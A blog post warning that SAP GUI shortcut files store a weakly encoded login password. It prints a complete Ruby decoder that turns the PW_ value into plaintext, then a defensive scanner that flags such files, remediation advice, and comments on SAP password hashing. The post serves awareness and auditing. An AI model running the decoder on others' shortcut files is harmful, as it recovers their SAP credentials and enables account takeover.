Decoding the SAP login password

Users can create a shortcut with the SAP connection data through the GUI. Nothing new so far; the worrying part is that this shortcut is basically a file containing the path to the binary, the user name and the encoded password, and that encoded password can be decoded with this small script to reveal its value.

So now you know, Basis consultant: no shortcuts.

Here is the Ruby code so you can try it and tell me how it goes.

#!/usr/bin/env ruby
#
# SAP Easy Access Password Decoder (Kernel 640)
# Supported character set A-Z,a-z,0-9,\/|<>,.;'#~@:[]{}+=()*&^%$£"!`
#
# Author: Mylestro
# Date: 17/02/2011
#

PROG_VER = 1.0

# Lookup tables, one per password position (1-8); filled in by populate_arrays.
@one, @two, @three, @four, @five, @six, @seven, @eight = Array.new(8) { Hash.new }
@master = Array.new

# Build the per-position tables: hex byte pair from the PW_ value => plaintext character.
def populate_arrays
  @one = {"19" => "a", "39" => "A", "1A" => "b", "3A" => "B", "1B" => "c", "3B" => "C", "1C" => "d", "3C" => "D", "1D" => "e", "3D" => "E", "1E" => "f", "3E" => "F", "1F" => "g", "3F" => "G", "10" => "h", "30" => "H", "11" => "i", "31" => "I", "12" => "j", "32" => "J", "13" => "k", "33" => "K", "14" => "l", "34" => "L", "15" => "m", "35" => "M", "16" => "n", "36" => "N", "17" => "o", "37" => "O", "08" => "p", "28" => "P", "09" => "q", "29" => "Q", "0A" => "r", "2A" => "R", "0B" => "s", "2B" => "S", "0C" => "t", "2C" => "T", "0D" => "u", "2D" => "U", "0E" => "v", "2E" => "V", "0F" => "w", "2F" => "W", "00" => "x", "20" => "X", "01" => "y", "21" => "Y", "02" => "z", "22" => "Z", "48" => "0", "49" => "1", "4A" => "2", "4B" => "3", "4C" => "4", "4D" => "5", "4E" => "6", "4F" => "7", "40" => "8", "41" => "9", "59" => "!", "5C" => "$", "DB" => "£", "5D" => "%", "38" => "@", "26" => "^", "52" => "*", "50" => "(", "51" => ")", "53" => "+", "45" => "=", "06" => "~", "5B" => "#", "44" => "<", "46" => ">", "24" => "\\", "57" => "/", "47" => "?", "56" => ".", "54" => ",", "43" => ";", "42" => ":", "5F" => "'", "03" => "{", "05" => "}", "23" => "[", "25" => "]", "18" => "`", "04" => "|"}
  @two = {"E0" => "a", "C0" => "A", "E3" => "b", "C3" => "B", "E2" => "c", "C2" => "C", "E5" => "d", "C5" => "D", "E4" => "e", "C4" => "E", "E7" => "f", "C7" => "F", "E6" => "g", "C6" => "G", "E9" => "h", "C9" => "H", "E8" => "i", "C8" => "I", "EB" => "j", "CB" => "J", "EA" => "k", "CA" => "K", "ED" => "l", "CD" => "L", "EC" => "m", "CC" => "M", "EF" => "n", "CF" => "N", "EE" => "o", "CE" => "O", "F1" => "p", "D1" => "P", "F0" => "q", "D0" => "Q", "F3" => "r", "D3" => "R", "F2" => "s", "D2" => "S", "F5" => "t", "D5" => "T", "F4" => "u", "D4" => "U", "F7" => "v", "D7" => "V", "F6" => "w", "D6" => "W", "F9" => "x", "D9" => "X", "F8" => "y", "D8" => "Y", "FB" => "z", "DB" => "Z", "B1" => "0", "B0" => "1", "B3" => "2", "B2" => "3", "B5" => "4", "B4" => "5", "B7" => "6", "B6" => "7", "B9" => "8", "B8" => "9", "A0" => "!", "A5" => "$", "22" => "£", "A4" => "%", "C1" => "@", "DF" => "^", "AB" => "*", "A9" => "(", "A8" => ")", "AA" => "+", "BC" => "=", "FF" => "~", "A2" => "#", "BD" => "<", "BF" => ">", "DD" => "\\", "AE" => "/", "BE" => "?", "AF" => ".", "AD" => ",", "BA" => ";", "BB" => ":", "A6" => "'", "FA" => "{", "FC" => "}", "DA" => "[", "DC" => "]", "E1" => "`", "FD" => "|"}
  @three = {"72" => "a", "52" => "A", "71" => "b", "51" => "B", "70" => "c", "50" => "C", "77" => "d", "57" => "D", "76" => "e", "56" => "E", "75" => "f", "55" => "F", "74" => "g", "54" => "G", "7B" => "h", "5B" => "H", "7A" => "i", "5A" => "I", "79" => "j", "59" => "J", "78" => "k", "58" => "K", "7F" => "l", "5F" => "L", "7E" => "m", "5E" => "M", "7D" => "n", "5D" => "N", "7C" => "o", "5C" => "O", "63" => "p", "43" => "P", "62" => "q", "42" => "Q", "61" => "r", "41" => "R", "60" => "s", "40" => "S", "67" => "t", "47" => "T", "66" => "u", "46" => "U", "65" => "v", "45" => "V", "64" => "w", "44" => "W", "6B" => "x", "4B" => "X", "6A" => "y", "4A" => "Y", "69" => "z", "49" => "Z", "23" => "0", "22" => "1", "21" => "2", "20" => "3", "27" => "4", "26" => "5", "25" => "6", "24" => "7", "2B" => "8", "2A" => "9", "32" => "!", "37" => "$", "B0" => "£", "36" => "%", "53" => "@", "4D" => "^", "39" => "*", "3B" => "(", "3A" => ")", "38" => "+", "2E" => "=", "6D" => "~", "30" => "#", "2F" => "<", "2D" => ">", "4F" => "\\", "3C" => "/", "2C" => "?", "3D" => ".", "3F" => ",", "28" => ";", "29" => ":", "34" => "'", "68" => "{", "6E" => "}", "48" => "[", "4E" => "]", "73" => "`", "6F" => "|"}
  @four = {"49" => "a", "69" => "A", "4A" => "b", "6A" => "B", "4B" => "c", "6B" => "C", "4C" => "d", "6C" => "D", "4D" => "e", "6D" => "E", "4E" => "f", "6E" => "F", "4F" => "g", "6F" => "G", "40" => "h", "60" => "H", "41" => "i", "61" => "I", "42" => "j", "62" => "J", "43" => "k", "63" => "K", "44" => "l", "64" => "L", "45" => "m", "65" => "M", "46" => "n", "66" => "N", "47" => "o", "67" => "O", "58" => "p", "78" => "P", "59" => "q", "79" => "Q", "5A" => "r", "7A" => "R", "5B" => "s", "7B" => "S", "5C" => "t", "7C" => "T", "5D" => "u", "7D" => "U", "5E" => "v", "7E" => "V", "5F" => "w", "7F" => "W", "50" => "x", "70" => "X", "51" => "y", "71" => "Y", "52" => "z", "72" => "Z", "18" => "0", "19" => "1", "1A" => "2", "1B" => "3", "1C" => "4", "1D" => "5", "1E" => "6", "1F" => "7", "10" => "8", "11" => "9", "09" => "!", "0C" => "$", "8B" => "£", "0D" => "%", "68" => "@", "76" => "^", "02" => "*", "00" => "(", "01" => ")", "03" => "+", "15" => "=", "56" => "~", "0B" => "#", "14" => "<", "16" => ">", "74" => "\\", "07" => "/", "17" => "?", "06" => ".", "04" => ",", "13" => ";", "12" => ":", "0F" => "'", "53" => "{", "55" => "}", "73" => "[", "75" => "]", "48" => "`", "54" => "|"}
  @five = {"81" => "a", "A1" => "A", "82" => "b", "A2" => "B", "83" => "c", "A3" => "C", "84" => "d", "A4" => "D", "85" => "e", "A5" => "E", "86" => "f", "A6" => "F", "87" => "g", "A7" => "G", "88" => "h", "A8" => "H", "89" => "i", "A9" => "I", "8A" => "j", "AA" => "J", "8B" => "k", "AB" => "K", "8C" => "l", "AC" => "L", "8D" => "m", "AD" => "M", "8E" => "n", "AE" => "N", "8F" => "o", "AF" => "O", "90" => "p", "B0" => "P", "91" => "q", "B1" => "Q", "92" => "r", "B2" => "R", "93" => "s", "B3" => "S", "94" => "t", "B4" => "T", "95" => "u", "B5" => "U", "96" => "v", "B6" => "V", "97" => "w", "B7" => "W", "98" => "x", "B8" => "X", "99" => "y", "B9" => "Y", "9A" => "z", "BA" => "Z", "D0" => "0", "D1" => "1", "D2" => "2", "D3" => "3", "D4" => "4", "D5" => "5", "D6" => "6", "D7" => "7", "D8" => "8", "D9" => "9", "C1" => "!", "C4" => "$", "43" => "£", "C5" => "%", "A0" => "@", "BE" => "^", "CA" => "*", "C8" => "(", "C9" => ")", "CB" => "+", "DD" => "=", "9E" => "~", "C3" => "#", "DC" => "<", "DE" => ">", "BC" => "\\", "CF" => "/", "DF" => "?", "CE" => ".", "CC" => ",", "DB" => ";", "DA" => ":", "C7" => "'", "9B" => "{", "9D" => "}", "BB" => "[", "BD" => "]", "80" => "`", "9C" => "|"}
  @six = {"A6" => "a", "86" => "A", "A5" => "b", "85" => "B", "A4" => "c", "84" => "C", "A3" => "d", "83" => "D", "A2" => "e", "82" => "E", "A1" => "f", "81" => "F", "A0" => "g", "80" => "G", "AF" => "h", "8F" => "H", "AE" => "i", "8E" => "I", "AD" => "j", "8D" => "J", "AC" => "k", "8C" => "K", "AB" => "l", "8B" => "L", "AA" => "m", "8A" => "M", "A9" => "n", "89" => "N", "A8" => "o", "88" => "O", "B7" => "p", "97" => "P", "B6" => "q", "96" => "Q", "B5" => "r", "95" => "R", "B4" => "s", "94" => "S", "B3" => "t", "93" => "T", "B2" => "u", "92" => "U", "B1" => "v", "91" => "V", "B0" => "w", "90" => "W", "BF" => "x", "9F" => "X", "BE" => "y", "9E" => "Y", "BD" => "z", "9D" => "Z", "F7" => "0", "F6" => "1", "F5" => "2", "F4" => "3", "F3" => "4", "F2" => "5", "F1" => "6", "F0" => "7", "FF" => "8", "FE" => "9", "E6" => "!", "E3" => "$", "64" => "£", "E2" => "%", "87" => "@", "99" => "^", "ED" => "*", "EF" => "(", "EE" => ")", "EC" => "+", "FA" => "=", "B9" => "~", "E4" => "#", "FB" => "<", "F9" => ">", "9B" => "\\", "E8" => "/", "F8" => "?", "E9" => ".", "EB" => ",", "FC" => ";", "FD" => ":", "E0" => "'", "BC" => "{", "BA" => "}", "9C" => "[", "9A" => "]", "A7" => "`", "BB" => "|"}
  @seven = {"61" => "a", "41" => "A", "62" => "b", "42" => "B", "63" => "c", "43" => "C", "64" => "d", "44" => "D", "65" => "e", "45" => "E", "66" => "f", "46" => "F", "67" => "g", "47" => "G", "68" => "h", "48" => "H", "69" => "i", "49" => "I", "6A" => "j", "4A" => "J", "6B" => "k", "4B" => "K", "6C" => "l", "4C" => "L", "6D" => "m", "4D" => "M", "6E" => "n", "4E" => "N", "6F" => "o", "4F" => "O", "70" => "p", "50" => "P", "71" => "q", "51" => "Q", "72" => "r", "52" => "R", "73" => "s", "53" => "S", "74" => "t", "54" => "T", "75" => "u", "55" => "U", "76" => "v", "56" => "V", "77" => "w", "57" => "W", "78" => "x", "58" => "X", "79" => "y", "59" => "Y", "7A" => "z", "5A" => "Z", "30" => "0", "31" => "1", "32" => "2", "33" => "3", "34" => "4", "35" => "5", "36" => "6", "37" => "7", "38" => "8", "39" => "9", "21" => "!", "24" => "$", "A3" => "£", "25" => "%", "40" => "@", "5E" => "^", "2A" => "*", "28" => "(", "29" => ")", "2B" => "+", "3D" => "=", "7E" => "~", "23" => "#", "3C" => "<", "3E" => ">", "5C" => "\\", "2F" => "/", "3F" => "?", "2E" => ".", "2C" => ",", "3B" => ";", "3A" => ":", "27" => "'", "7B" => "{", "7D" => "}", "5B" => "[", "5D" => "]", "60" => "`", "7C" => "|"}
  @eight = {"5F" => "a", "7F" => "A", "5C" => "b", "7C" => "B", "5D" => "c", "7D" => "C", "5A" => "d", "7A" => "D", "5B" => "e", "7B" => "E", "58" => "f", "78" => "F", "59" => "g", "79" => "G", "56" => "h", "76" => "H", "57" => "i", "77" => "I", "54" => "j", "74" => "J", "55" => "k", "75" => "K", "52" => "l", "72" => "L", "53" => "m", "73" => "M", "50" => "n", "70" => "N", "51" => "o", "71" => "O", "4E" => "p", "6E" => "P", "4F" => "q", "6F" => "Q", "4C" => "r", "6C" => "R", "4D" => "s", "6D" => "S", "4A" => "t", "6A" => "T", "4B" => "u", "6B" => "U", "48" => "v", "68" => "V", "49" => "w", "69" => "W", "46" => "x", "66" => "X", "47" => "y", "67" => "Y", "44" => "z", "64" => "Z", "0E" => "0", "0F" => "1", "0C" => "2", "0D" => "3", "0A" => "4", "0B" => "5", "08" => "6", "09" => "7", "06" => "8", "07" => "9", "1F" => "!", "1A" => "$", "9D" => "£", "1B" => "%", "7E" => "@", "60" => "^", "14" => "*", "16" => "(", "17" => ")", "15" => "+", "03" => "=", "40" => "~", "1D" => "#", "02" => "<", "00" => ">", "62" => "\\", "11" => "/", "01" => "?", "10" => ".", "12" => ",", "05" => ";", "04" => ":", "19" => "'", "45" => "{", "43" => "}", "65" => "[", "63" => "]", "5E" => "`", "42" => "|"}
  # @master is indexed by password position, so index 0 stays unused
  @master[1] = @one
  @master[2] = @two
  @master[3] = @three
  @master[4] = @four
  @master[5] = @five
  @master[6] = @six
  @master[7] = @seven
  @master[8] = @eight
end

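# Print the character that hex pair current_char stands for at the given position (1-8)
def char_lookup(position,current_char)
  temp = @master[position]
  # Table keys are upper-case hex, so accept lower-case input as well
  print temp[current_char.upcase]
end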

begin
  populate_arrays
  if ARGV.size != 1
    puts "[-] Invalid number of arguments"
    exit
  end
  # The encoded value is whatever follows the "PW_" marker in the argument
  hash = ARGV[0].split("PW_")[1]
  if hash.nil?
    puts "[-] No PW_ value found in argument"
    exit
  end
  if hash.length > 16
    puts "[-] Password is over 8 characters, not supported"
    exit
  end

  if hash.length % 2 != 0
    puts "[-] Invalid hash length"
    exit
  end

  # Each password character is stored as one hex byte pair
  hash_size = hash.length / 2
  print "[+] Decoded password: "
  position = 1
  value = 0
  hash_size.times do
    current_char = hash[value,2]
    char_lookup(position,current_char)
    value = value + 2
    position = position.next
  end
  puts
end

via: msploit
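
To back the "no shortcuts" advice with a check, the following added example (not part of the original post or of the script above) walks a directory tree and reports shortcut files that embed a PW_ value, without decoding or printing it. The ".sap" extension, the INI-style [User] / Name= / Password= layout and the sample content are assumptions; the page itself only shows the PW_ marker.

```ruby
require "find"

# Constructed sample, not taken from a real system. The INI-style layout and the
# ".sap" extension are assumptions; the page itself only shows the PW_ marker.
SAMPLE_SHORTCUT = <<~SAP
  [System]
  Name=PRD
  [User]
  Name=JDOE
  Password=PW_00000000
SAP

# Returns nil if the text holds no stored password, otherwise the user name and
# the password length. The encoded value is deliberately not returned.
def audit_shortcut(text)
  section = user = pw_chars = nil
  text.each_line do |raw|
    line = raw.strip # also drops the CR of CRLF line endings
    if (m = line.match(/\A\[(.+)\]\z/))
      section = m[1].downcase
    elsif section == "user" && (m = line.match(/\AName\s*=\s*(.+)\z/i))
      user = m[1]
    elsif (m = line.match(/\APassword\s*=\s*PW_((?:\h\h)+)\z/i))
      pw_chars = m[1].length / 2 # one hex pair per password character
    end
  end
  pw_chars && { user: user, password_chars: pw_chars }
end

# Walk a directory tree and report every shortcut file that embeds a password.
def scan_for_stored_passwords(root)
  findings = []
  Find.find(root) do |path|
    next unless File.file?(path) && File.extname(path).casecmp?(".sap")
    hit = audit_shortcut(File.binread(path))
    findings << hit.merge(path: path) if hit
  end
  findings.sort_by { |f| f[:path] }
end

# Usage: ruby audit_shortcuts.rb <directory>
if __FILE__ == $PROGRAM_NAME && ARGV[0]
  scan_for_stored_passwords(ARGV[0]).each do |f|
    puts "[!] #{f[:path]}: stored password (#{f[:password_chars]} chars), user #{f[:user] || 'unknown'}"
  end
end
```

Every file it reports should be treated as holding a plaintext password: delete the stored value from the shortcut and change the affected user's password.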

Antonio Mejias - cyfuss

I'm Antonio Mejias in real life, cyfuss online, OpenText - SAP functional coordinator in my working life, and I have too many hobbies the rest of the time. If you are interested in getting in touch, don't hesitate; it will be a pleasure to talk with you. If you want to know more about me, you can visit http://cyfuss.com/sobre-mi.

2 thoughts on “Decoding the SAP login password”

  • 04/01/2016 at 18:52

    Hello Antonio.

    How can the SAP (B1) user be verified via web? From what I have seen, the USR0 table has the nick field, the encrypted password and a salt field. Which encryption function is used to store the password?

    Thanks.

    • Antonio Mejias - cyfuss
      08/01/2016 at 20:59

      Hello Manuel,

      I'm not very sure which encryption function the SAP standard uses (depending on the version it may be MD5 or SHA-1); what I can tell you, in case you need to encrypt a password via ABAP, is that you can use the function module FIEB_PASSWORD_ENCRYPT to encrypt it and FIEB_PASSWORD_DECRYPT to decrypt it.

      I hope I was able to help…

      Regards,
      Antonio
